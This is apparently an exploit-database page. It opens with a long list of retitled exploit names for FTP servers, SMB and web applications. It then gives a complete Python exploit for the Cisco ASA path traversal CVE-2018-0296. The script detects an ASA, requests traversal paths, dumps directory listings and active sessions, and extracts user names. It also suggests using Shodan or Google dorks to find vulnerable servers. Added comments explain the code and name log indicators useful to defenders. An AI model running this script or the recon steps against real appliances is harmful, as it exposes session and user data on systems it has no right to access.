
5 changes to exploits/shellcodes Microsoft Windows - WRITE_ANDX SMB command handling Kernel Denial of Service (Metasploit) Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit) freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow (PoC) freeSSHd 1.2.1 - (Authenticated) SFTP 'rename' Remote Buffer Overflow (PoC) freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow (PoC) freeSSHd 1.2.1 - (Authenticated) SFTP 'realpath' Remote Buffer Overflow (PoC) Novell Groupwise 8.0 - Malformed RCPT Command Off-by-One Novell Groupwise 8.0 - 'RCPT' Off-by-One WarFTPd 1.82.00-RC12 - LIST command Format String Denial of Service WarFTPd 1.82.00-RC12 - 'LIST' Format String Denial of Service Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities Sysax Multi Server < 5.25 (SFTP Module) - Multiple Denial of Service Vulnerabilities Novell Groupwise Internet Agent - IMAP LIST Command Remote Code Execution Novell Groupwise Internet Agent - IMAP LIST LSUB Command Remote Code Execution Novell Groupwise Internet Agent - IMAP 'LIST' Remote Code Execution Novell Groupwise Internet Agent - IMAP 'LIST LSUB' Remote Code Execution Solar FTP Server 2.0 - Multiple Commands Denial of Service Vulnerabilities Solar FTP Server 2.0 - Multiple Denial of Service Vulnerabilities LiteServe 2.81 - PASV Command Denial of Service LiteServe 2.81 - 'PASV' Denial of Service Notepad++ NppFTP plugin - LIST command Remote Heap Overflow (PoC) Notepad++ NppFTP Plugin - 'LIST' Remote Heap Overflow (PoC) TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service Vulnerabilities TYPSoft FTP Server 1.10 - Multiple Denial of Service Vulnerabilities WFTPD 2.4.1RC11 - STAT/LIST Command Denial of Service WFTPD 2.4.1RC11 - 'STAT'/'LIST' Denial of Service WFTPD 2.4.1RC11 - MLST Command Remote Denial of Service WFTPD 2.4.1RC11 - 'MLST' Remote Denial of Service Oracle 8i - dbsnmp Command Remote Denial of Service Oracle 8i - 
'dbsnmp' Remote Denial of Service Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow Mollensoft Software Enceladus Server Suite 3.9 - 'FTP' Buffer Overflow GuildFTPd 0.999.8 - CWD Command Denial of Service GuildFTPd 0.999.8 - 'CWD' Denial of Service Xlight FTP Server 1.25/1.41 - PASS Command Remote Buffer Overflow Xlight FTP Server 1.25/1.41 - 'PASS' Remote Buffer Overflow RobotFTP Server 1.0/2.0 - Remote Command Denial of Service RobotFTP Server 1.0/2.0 - Remote Denial of Service RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (1) RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (2) RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (3) RhinoSoft Serv-U FTPd Server 3/4/5 - 'MDTM' Time Argument Buffer Overflow (1) RhinoSoft Serv-U FTPd Server 3/4/5 - 'MDTM' Time Argument Buffer Overflow (2) RhinoSoft Serv-U FTPd Server 3/4/5 - 'MDTM' Time Argument Buffer Overflow (3) Opera Web Browser 7.54 - KDE KFMCLIENT Remote Command Execution Opera Web Browser 7.54 - 'KDE KFMCLIENT' Remote Command Execution MailEnable 1.x - SMTP HELO Command Remote Denial of Service MailEnable 1.x - SMTP 'HELO' Remote Denial of Service HP Printer FTP Print Server 2.4.5 - List Command Buffer Overflow HP Printer FTP Print Server 2.4.5 - 'LIST' Buffer Overflow HP JetDirect FTP Print Server - RERT Command Denial of Service HP JetDirect FTP Print Server - 'RERT' Denial of Service FSD 2.052/3.000 - servinterface.cc servinterface::sendmulticast Function PIcallsign Command Remote Overflow FSD 2.052/3.000 - 'servinterface.cc servinterface::sendmulticast' 'PIcallsign' Command Remote Overflow freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Remote Denial of Service Qbik WinGate 6.2.2 - LIST Command Remote Denial of Service Qbik WinGate 6.2.2 - 'LIST' Remote Denial of Service Quick 'n Easy FTP Server 3.9.1 - USER Command Remote Buffer 
Overflow Quick 'n Easy FTP Server 3.9.1 - 'USER' Remote Buffer Overflow Ability FTP Server 2.1.4 - 'afsmain.exe' USER Command Remote Denial of Service Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote Denial of Service Ability FTP Server 2.1.4 - 'afsmain.exe' 'USER' Remote Denial of Service Ability FTP Server 2.1.4 - Admin Panel 'AUTHCODE' Remote Denial of Service Resolv+ (RESOLV_HOST_CONF) - Linux Library Command Execution Resolv+ 'RESOLV_HOST_CONF' - Linux Library Command Execution Platform Load Sharing Facility 4/5 - LSF_ENVDIR Local Command Execution Platform Load Sharing Facility 4/5 - 'LSF_ENVDIR' Local Command Execution Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Command Exeuction Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Command Execution Golden FTP Server 4.70 - PASS Command Buffer Overflow Golden FTP Server 4.70 - 'PASS' Buffer Overflow EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit) EasyFTP Server 1.7.0.11 - 'MKD' Stack Buffer Overflow (Metasploit) Vermillion FTP Daemon - PORT Command Memory Corruption (Metasploit) Vermillion FTP Daemon - 'PORT' Memory Corruption (Metasploit) EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow (Metasploit) EasyFTP Server 1.7.0.11 - 'LIST' Stack Buffer Overflow (Metasploit) EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow (Metasploit) EasyFTP Server 1.7.0.11 - 'CWD' Stack Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'connectedNodes.ovp'l Remote Command Execution (Metasploit) Zabbix Agent - net.tcp.listen Command Injection (Metasploit) Zabbix Agent - 'net.tcp.listen' Command Injection (Metasploit) Actfax FTP Server 4.27 - USER Command Stack Buffer Overflow (Metasploit) Actfax FTP Server 4.27 - 'USER' Stack Buffer Overflow (Metasploit) HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / 
Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (1) HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (2) HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - 'rpc.ypupdated' Command Execution (1) HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - 'rpc.ypupdated' Command Execution (2) Majordomo 1.89/1.90 - lists Command Execution Majordomo 1.89/1.90 - 'lists' Command Execution PALS Library System WebPALS 1.0 - pals-cgi Arbitrary Command Execution PALS Library System WebPALS 1.0 - 'pals-cgi' Arbitrary Command Execution SGI IRIX 6.x - rpc.xfsmd Remote Command Execution SGI IRIX 6.x - 'rpc.xfsmd' Remote Command Execution HP-UX FTPD 1.1.214.4 - REST Command Memory Disclosure HP-UX FTPD 1.1.214.4 - 'REST' Memory Disclosure Sami FTP Server 2.0.1 - LIST Command Buffer Overflow Sami FTP Server 2.0.1 - 'LIST' Buffer Overflow Sami FTP Server - LIST Command Buffer Overflow (Metasploit) Sami FTP Server - 'LIST' Buffer Overflow (Metasploit) PineApp Mail-SeCure - livelog.html Arbitrary Command Execution (Metasploit) PineApp Mail-SeCure - 'livelog.html' Arbitrary Command Execution (Metasploit) FSD 2.052/3.000 - sysuser.cc sysuser::exechelp Function HELP Command Remote Overflow FSD 2.052/3.000 - 'sysuser.cc sysuser::exechelp' 'HELP' Remote Overflow HP Data Protector - EXEC_BAR Remote Command Execution HP Data Protector - 'EXEC_BAR' Remote Command Execution IPtools 0.1.4 - Remote Command Server Buffer Overflow IPtools 0.1.4 - Remote Buffer Overflow TWiki 20030201 - search.pm Remote Command Execution TWiki 20030201 - 'search.pm' Remote Command Execution AWStats 6.0 < 6.2 - configdir Remote Command Execution (C) AWStats 6.0 < 6.2 - configdir Remote Command Execution (Perl) AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (C) AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (Perl) Guppy 4.5.9 - 'REMOTE_ADDR' Remote Commands Execution 
Guppy 4.5.9 - 'REMOTE_ADDR' Remote Command Execution SimpleBBS 1.1 - Remote Commands Execution SimpleBBS 1.1 - Remote Command Execution SimpleBBS 1.1 - Remote Commands Execution (C) SimpleBBS 1.1 - Remote Command Execution (C) Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Flatnuke 2.5.6 - Privilege Escalation / Remote Command Execution phpBB 2.0.17 - 'signature_bbcode_uid' Remote Command phpDocumentor 1.3.0 rc4 - Remote Commands Execution phpBB 2.0.17 - 'signature_bbcode_uid' Remot Command phpDocumentor 1.3.0 rc4 - Remote Command Execution CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution SPIP 1.8.2g - Remote Commands Execution CPGNuke Dragonfly 9.0.6.1 - Remote Command Execution SPIP 1.8.2g - Remote Command Execution DocMGR 0.54.2 - 'file_exists' Remote Commands Execution DocMGR 0.54.2 - 'file_exists' Remote Command Execution EnterpriseGS 1.0 rc4 - Remote Commands Execution FlySpray 0.9.7 - 'install-0.9.7.php' Remote Commands Execution EnterpriseGS 1.0 rc4 - Remote Command Execution FlySpray 0.9.7 - 'install-0.9.7.php' Remote Command Execution PHPKIT 1.6.1R2 - 'filecheck' Remote Commands Execution PHPKIT 1.6.1R2 - 'filecheck' Remote Command Execution Coppermine Photo Gallery 1.4.3 - Remote Commands Execution Coppermine Photo Gallery 1.4.3 - Remote Command Execution GeekLog 1.x - 'error.log' (gpc = Off) Remote Commands Execution GeekLog 1.x - 'error.log' Remote Command Execution PHP-Stats 0.1.9.1 - Remote Commands Execution PHP-Stats 0.1.9.1 - Remote Commans Execution Gallery 2.0.3 - stepOrder[] Remote Commands Execution Gallery 2.0.3 - 'stepOrder[]' Remote Command Execution phpList 2.10.2 - GLOBALS[] Remote Code Execution phpList 2.10.2 - 'GLOBALS[]' Remote Code Execution Simplog 0.9.2 - 's' Remote Commands Execution Simplog 0.9.2 - 's' Remote Command Execution phpWebSite 0.10.2 - 'hub_dir' Remote Commands Execution phpWebSite 0.10.2 - 'hub_dir' Remote Command Execution phpGroupWare 0.9.16.010 - GLOBALS[] Remote Code Execution phpGroupWare 
0.9.16.010 - 'GLOBALS[]' Remote Code Execution GuppY 4.5.16 - Remote Commands Execution GuppY 4.5.16 - Remote Command Execution AWStats 6.1 < 6.2 - configdir Remote Command Execution (Metasploit) AWStats 6.1 < 6.2 - 'configdir' Remote Command Execution (Metasploit) Achievo 0.7/0.8/0.9 - Remote File Inclusion Command Execution Achievo 0.7/0.8/0.9 - Remote File Inclusion / Command Execution SiteInteractive Subscribe Me - Setup.pl Arbitrary Command Execution SiteInteractive Subscribe Me - 'Setup.pl' Arbitrary Command Execution BEESCMS 4.0 - Cross-Site Request Forgery (Add Admin) HongCMS 3.0.0 - SQL Injection hycus CMS 1.0.4 - Authentication Bypass DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting Cisco Adaptive Security Appliance - Path Traversal
'''
Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques.

Vulnerable Products
This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products:

3000 Series Industrial Security Appliance (ISA)
ASA 1000V Cloud Firewall
ASA 5500 Series Adaptive Security Appliances
ASA 5500-X Series Next-Generation Firewalls
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
Adaptive Security Virtual Appliance (ASAv)
Firepower 2100 Series Security Appliance
Firepower 4100 Series Security Appliance
Firepower 9300 ASA Security Module
FTD Virtual (FTDv)
Script usage
Installation: git clone https://github.com/yassineaboukir/CVE-2018-0296.git
Usage: python cisco_asa.py <URL>
If the web server is vulnerable, the script will dump in a text file both the content of the current directory, files in +CSCOE+ and active sessions.

Disclaimer: please note that due to the nature of the vulnerability disclosed to Cisco, this exploit could result in a DoS so test at your own risk.

Bug Bounty Recon
You can use Shodan, Censys or any other OSINT tools to enumerate vulnerable servers or simply google dork /+CSCOE+/logon.html. Figure it out :)

References:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd
'''

#!/usr/bin/env python

import requests
import sys
import urlparse
import os
import re

# NOTE(review): `urlparse` is the Python 2 module name (Python 3 moved it to
# `urllib.parse`), so this script as written only runs under Python 2.

print("""
_____ _____ _____ _____ _____ ___ _____ ___
/ __ \_ _/ ___/ __ \ _ | / _ \ / ___|/ _ \
| / \/ | | \ `--.| / \/ | | | / /_\ \\ `--./ /_\ \
| | | | `--. \ | | | | | | _ | `--. \ _ |
| \__/\_| |_/\__/ / \__/\ \_/ / | | | |/\__/ / | | |
\____/\___/\____/ \____/\___/ \_| |_/\____/\_| |_/

______ _ _ _____ _
| ___ \ | | | | |_ _| | |
| |_/ /_ _| |_| |__ | |_ __ __ ___ _____ _ __ ___ __ _| |
| __/ _` | __| '_ \ | | '__/ _` \ \ / / _ \ '__/ __|/ _` | |
| | | (_| | |_| | | | | | | | (_| |\ V / __/ | \__ \ (_| | |
\_| \__,_|\__|_| |_| \_/_| \__,_| \_/ \___|_| |___/\__,_|_|

CVE-2018-0296
Script author: Yassine Aboukir(@yassineaboukir)
""")

# Silences the InsecureRequestWarning that every verify=False request below
# would otherwise print; TLS certificates of the target are never validated.
requests.packages.urllib3.disable_warnings()

# Base URL of the target. sys.argv[1] is read without a length check, so
# running the script with no argument raises IndexError instead of usage text.
url = sys.argv[1]

# regexSess: a digit followed by word characters up to a closing single quote,
# applied to the sessions listing to pick out session identifiers.
# regexUser: the literal prefix `user:` plus word characters, applied to each
# session file to pick out user names.
regexSess = r"([0-9])\w+'"
regexUser = r"(user:)\w+"

# Directory this script lives in; only used in the final success message.
dir_path = os.path.dirname(os.path.realpath(__file__))

# The three file_list.json requests that exercise the traversal
# (`/+CSCOU+/../+CSCOE+/`). From a defender's side these request paths are the
# thing to look for in web-server / WAF logs when checking whether an
# appliance is being probed for CVE-2018-0296; fixed releases are listed in the
# Cisco advisory referenced in the module docstring.
filelist_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/"
CSCOE_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b"
active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"
# WebVPN logon page; fetched first, only to recognise an ASA.
logon = "/+CSCOE+/logon.html"

# Fingerprint step: fetch the logon page without following redirects and
# decide by the presence of the `webvpnLang` cookie on that response.
try:
    is_cisco_asa = requests.get(urlparse.urljoin(url,logon), verify=False, allow_redirects=False)
except requests.exceptions.RequestException as e:
    print(e)
    sys.exit(1)

if "webvpnLang" in is_cisco_asa.cookies:
    # All three listings are requested up front; a transport error on any of
    # them aborts the run, a non-200 status does not.
    try:
        filelist_r = requests.get(urlparse.urljoin(url,filelist_dir), verify=False)
        CSCOE_r = requests.get(urlparse.urljoin(url,CSCOE_dir), verify=False)
        active_sessions_r = requests.get(urlparse.urljoin(url,active_sessions), verify=False)

    except requests.exceptions.RequestException as e:
        print(e)
        sys.exit(1)

    # Only the first response's status decides the verdict; CSCOE_r and
    # active_sessions_r are written to the dump whatever their status was.
    if str(filelist_r.status_code) == "200":
        # The dump file is named after the URL's hostname and is created in the
        # current working directory, not in dir_path (which the success message
        # below reports). urlparse(url).hostname is None for a URL without a
        # scheme, in which case the "+ '.txt'" concatenation raises TypeError.
        with open(urlparse.urlparse(url).hostname+".txt", "w") as cisco_dump:
            cisco_dump.write("======= Directory Index =========\n {}\n ======== +CSCEO+ Directory ========\n {}\n ======= Active sessions =========\n {}\n ======= Active Users =========\n".format(filelist_r.text, CSCOE_r.text, active_sessions_r.text))

            ''' Extraccion de usuarios'''
            # User extraction: for every session id matched in the sessions
            # listing, fetch that session's file_list.json entry and copy each
            # `user:<name>` match into the dump, one per line.
            matches_sess = re.finditer(regexSess, active_sessions_r.text)
            for match_sess in matches_sess:
                active_users_r = requests.get(urlparse.urljoin(url,"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"+str(match_sess.group().strip("'"))), verify=False)
                matches_user = re.finditer(regexUser, active_users_r.text)

                for match_user in matches_user:
                    cisco_dump.write(match_user.group()+"\n")
            ''' Fin Extraccion de usuarios'''
            # (end of user extraction)

        print("Vulnerable! Check the text dump saved in {}".format(dir_path))
    else: print("Not vulnerable!")

else:
    # No `webvpnLang` cookie: the host was not recognised as an ASA WebVPN
    # endpoint, so nothing further is requested.
    print("This is not Cisco ASA! e.g: https://vpn.example.com/+CSCOE+/logon.html\n")
    sys.exit(1)